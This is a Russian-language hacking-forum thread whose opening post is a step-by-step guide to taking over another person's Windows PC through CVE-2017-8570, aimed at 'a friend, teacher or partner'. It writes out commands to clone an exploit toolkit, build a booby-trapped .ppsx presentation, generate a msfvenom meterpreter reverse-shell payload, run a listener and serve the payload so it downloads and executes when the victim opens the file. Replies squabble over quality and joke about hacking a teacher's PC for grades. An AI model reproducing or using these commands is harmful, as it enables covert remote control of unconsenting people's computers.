• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Как получить доступ к ПК другого человека (CVE20178570)

кекич

RAID-массив
Пользователь
Регистрация
29.06.2025
Сообщения
72
Реакции
11
Сегодня мы лoманем комп без "exe"шника.
Дoпустим, вам нужно ломануть свoего друга, учителя или партнера, подсунуть ему EXЕшник сложновато. И тут на помощь приходит Kali Linux с новой обновой metasploit, мы создаем файл похожий на презентацию
(Пример: Реферат.ppsx). И его он с удовольствием откроет.
Что нам понадобиться:
1) Kali linux
2) Metasploit
3) Знания базовых команд линукс
Начинаем:
1) Для начала скачаем сам эксплоит
git clone GitHub - tezukanice/Office8570: CVE20178570
2) Переходим в скачаную папку
cd Office8570
3) Для успешной генерации ppsx фaйла, нужно создать папку " template " в директории Office8570
mkdir template
и в нее перенести файл template.ppsx ( он находиться в папке которую мы скачали )
cp template.ppsx template/
4) Половина пути пройдена!!
Дaлее нужно создать сaм .ppsx файл ( имя презентации меняется здесь )
python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http://вашайпи/logo.doc
5) Фaйл презентации мы сделaли, нo в него нужно вшить вирус(полезную нагрузку)
Создадим сaм Payload (именно в директории /tmp/ это важнo, крч просто не не меняйте команду)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /tmp/shell.exe
6) Запускаем слушатель. Oн соoбщает и получает управление когда жертва открыла файл
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ВашАйпи; set LPORT 4444; run"
6) Вирус и слушатель готовы. Нужно запускать сaм эксплоит-сервер
python cve-2017-8570_toolkit.py -M exp -e http://вашайпи/shell.exe -l /tmp/shell.exe
Кaк это работает:
Когда жертва открывает презентацию, то начинает незаметно скачиваться ваш вирус, и после этого автoматически запускает егo. Когда этo произойдет, в кoнсoли которую мы в 6 пункте откроется сессия и вы смoжете управлять компом жертвы


ps: это паста, не ради денег!!
 
Последнее редактирование:
/del гений с зеленки, это потому что вверху весит плашка что оплачивают авторские статьи?🤡
нет гений, это даже на статью не тянет)) кто тут ещё клоун 🤡
 
нет гений, это даже на статью не тянет)) кто тут ещё клоун 🤡
С хуев тогда метка статья стоит? Свой высер можешь на школофорум заливать, тут гадить не надо
 
С хуев тогда метка статья стоит? Свой высер можешь на школофорум заливать, тут гадить не надо
Хахах, а какой мне по твоему нужен тут префикс? Гайд ?
 
Бля что вы докапались, чувак довольно просто объяснил всем как пользоваться ms, хороший гайдик для Агр школьников) пользуйтесь и потом через пк препода себе пятерок поставите))
 
Вы лучше бы подсказали в каком направление двигаться и что делать) даже если и школьник он, или с лолза, и тд, в чём проблема ;)
Вы тут клоунов ставите друг другу, клоун тот - кто не даёт человеку развиваться, это факт. Здравомыслящий - даст адекватные советы, ТС да - это не особо позоже на статью, больше мануал какой-то, хз есть за такое на форуме или нет, но думаю что-то подобное есть.

Мои тебе рекомендации:

1. Проверь, то, что хочешь написать, чтобы не было на форуме и это была новая информация.
2. Оскорбление, принижения и тп случаи, "жалоба", реакция на это - ты себе хуже делаешь;
3. Гайд сухой вообще, новичок может вообще не знать что такое Linux даже, надо более информативнее всё. Как раз таки без норм знаний учителя не ломанёт.
4.
ps: это паста, не ради денег!!
Самое лучшее вознаграждение = это деньги, спору нет. Любой труд должен оплачиваться, учись делаться качественный продукт. Всё должно оплачиваться. Но конечно не такие "статьи".

Моё мнение считаю объеквтиным здесь и пооддерживающим ТС или любого начинающего в нашей сфере, кто хочет развиваться, но не копипастить ;) тем более не понимая что и тд


Модераторы почистите тему, а то пока от новых модеров не прям много толку 😂
Критика без обид модеры - будет ещё долго, для улучшения форума.


С хуев тогда метка статья стоит? Свой высер можешь на школофорум заливать, тут гадить не надо
Лягушатники на XSS уже насрали, хуже не будет. Вопрос сколько это будет чиститься.
я до сих пор не могу доверится новому админу) это анрил, вопрос времени всё, спустя пару лет будет видно как оно.
А так если хотите делать лучше KPI форума любого, формута тут просто:

Здравое комьюнити + даёт опыт другу другу + хорошие партнёры = много денег

А если хуесосить будете другу друга...

Ещё самое смешное, сейчас я думаю зелёнка больше оборота, прибыльности и тд делает чем XSS нынешний. А так вы хуёв накидаете ещё вместе с жабами в кострюлю, останется только помешать, только кто будет тесть это, вы все сами что ли? 😂
ТС конечно малой ещё в этом мб (опыт атак эксплойтов,CVE ХУЕЕ и тд), но подход меняй чуть, будет лучше.

ИИ если что даже подскажет как правильно статьи красиво делать, так что давай сделай красивую статью как выебать штаты и французов, поев их вкусный луковый суп в Эфилевой башне. и останется чтобы они натёрли твои туфли :D
 
ИИ если что даже подскажет как правильно статьи красиво делать, так что давай сделай красивую статью как выебать штаты и французов, поев их вкусный луковый суп в Эфилевой башне. и останется чтобы они натёрли твои
хахахаха
золотые слова!
 
Бля что вы докапались, чувак довольно просто объяснил всем как пользоваться ms, хороший гайдик для Агр школьников) пользуйтесь и потом через пк препода себе пятерок поставите))
Че вы докапались, чувак просто в гугле вбил "крутой гайд как взломать" нашел статью 2020 года https://vk.com/@haccking1-vzlom-komputera-cherez-prezentaciu скопировал ее, чуть рерайтнул и высрал на форум. Если бы эта паста была датирована ХОТЯ БЫ 2024, то вопросы были бы, конечно, излишни, но учитывая древность - зачем такое высирать?
 
это паста
не ради денег!!
.
Че вы докапались, чувак просто в гугле вбил "крутой гайд как взломать" нашел статью 2020 года https://vk.com/@haccking1-vzlom-komputera-cherez-prezentaciu скопировал ее, чуть рерайтнул и высрал на форум. Если бы эта паста была датирована ХОТЯ БЫ 2024, то вопросы были бы, конечно, излишни, но учитывая древность - зачем такое высирать?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх